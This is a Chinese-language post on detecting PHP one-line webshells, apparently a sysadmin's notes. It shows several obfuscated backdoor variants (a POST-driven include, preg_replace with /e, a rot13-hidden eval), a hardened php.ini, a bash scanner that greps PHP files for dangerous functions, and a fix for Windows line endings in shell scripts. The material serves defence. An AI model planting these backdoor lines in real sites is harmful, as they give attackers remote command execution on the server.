隐藏变种:

include($_POST['a']);
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

expose_php = OFF
register_globals = Off
display_errors = Off
cgi.fix_pathinfo=0
magic_quotes_gpc = On
allow_url_fopen = Off
allow_url_include = Off
配置open_basedir

#!/bin/bash
 
findpath=./
logfile=findtrojan.log
 
echo -e $(date +%Y-%m-%d_%H:%M:%S)" start\r" >>$logfile
echo -e '============changetime list==========\r\n' >> ${logfile}
find ${findpath} -name "*.php" -ctime -3 -type f -exec ls -l {} \; >> ${logfile}
 
echo -e '============nouser file list==========\r\n' >> ${logfile}
find  ${findpath} -nouser -nogroup -type f -exec ls -l {} \; >> ${logfile}
 
echo -e '============php one word trojan ==========\r\n' >> ${logfile}
find ${findpath} -name "*.php" -exec egrep -I -i -C1 -H  'exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS' {} \; >> ${logfile}
#使用使用-l 代替-C1 -H 可以只打印文件名
echo -e $(date +%Y-%m-%d_%H:%M:%S)" end\r" >>$logfile
 
more $logfile

运行脚本时出现了这样一个错误，打开之后并没有找到所谓的^M，查了之后才知道原来是文件格式的问题，也就是linux和windows之间的不完全兼容。。。
具体细节不管，如果验证：

vim test.sh
:set ff?
如果出现fileforma＝dos那么就基本可以确定是这个问题了。
:set fileformat=unix
:wq
OK了。。。。。。。

/bin/bash^M: bad interpreter: 没有那个文件或目录

错误分析:

因为操作系统是windows，我在windows下编辑的脚本，所以有可能有不可见字符。

脚本文件是DOS格式的, 即每一行的行尾以 来标识, 其ASCII码分别是0x0D, 0x0A.

可以有很多种办法看这个文件是DOS格式的还是UNIX格式的, 还是MAC格式的

解决方法：

vim filename

然后用命令

:set ff? #可以看到dos或unix的字样. 如果的确是dos格式的。
然后用
:set ff=unix #把它强制为unix格式的, 然后存盘退出。
再次运行脚本。

注：本站部分信息可能源于互联网分享，如有侵权，请告知，我们将及时删除！